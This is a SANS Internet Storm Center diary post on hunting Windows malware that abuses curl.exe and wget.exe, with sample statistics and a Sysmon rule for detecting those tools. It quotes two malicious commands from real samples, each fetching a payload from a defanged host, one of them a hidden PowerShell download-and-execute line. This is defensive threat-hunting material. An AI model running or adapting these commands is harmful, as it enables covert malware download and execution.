Threat Level: green Handler on Duty: Brad Duncan

SANS ISC: Keep an Eye on Command-Line Browsers InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Keep an Eye on Command-Line Browsers

Published: 2020-02-14
Last Updated: 2020-02-14 06:26:15 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

For a few weeks, I’m searching for suspicious files that make use of a command line browser like curl.exe or wget.exe in Windows environment. Wait, you were not aware of this? Just open a cmd.exe and type ‘curl.exe’ on your Windows 10 host:

If tools like bitsadmin.exe are well-known to be (ab)used by malware samples[1], today, less attention is given to command-llne browsers like curl.exe or wget.exe. Those tools are powerfull (see my diary about many curl features[2]) and, in my opinion, deserve to be kept under your hunting rules.

I'm hunting for samples on VT that use one of those two browsers and I found a bunch of them:

Most of them are PE files and the average detection score is 16.

Win32 EXE 208
ZIP 40
RAR 12
Windows Installer 9
MS Word Document 3
Windows shortcut 2
Android 1
Win32 DLL 1
unknown 1

Some of them are very simple but effective. Here is an example of command embedded in a malicious .lnk file :

C:\Windows\System32\cmd.exe /c curl.exe hxxp://87[.]57[.]141[.]215/Cell.png -o C:\Windows\Tasks\Cell.png

If curl.exe is available as a standard tool in latest Windows operating systems, don't forget that tools can be installed via 3rd party applications or packages. I searched across many Windows devices and found alternatives:

(Via GNU tools)
C:\Program Files (x86)\GnuWin32\bin\wget.exe
(Via MingW)
(Or Cygwin)
C:\Program Files\Cygwin\bin\wget.exe

Sometimes, if no command-line browser is not available, the sample just downloads its own copy. Example:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass \
    -noprofile -windowstyle hidden 
    (new-object'hxxp://www[.]kuaishounew[.]com/wget.exe','wget.exe'); \
&start start2.bat

I found very old samples that used wget.exe to fetch malicious files (one from 2015!) but today we have powerful tools to keep an eye on such tools, a Sysmon rule can be helpful to track them:

<Image condition="contains any">wget.exe;curl.exe</Image>

Happy hunting!


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

2 comment(s)
Diary Archives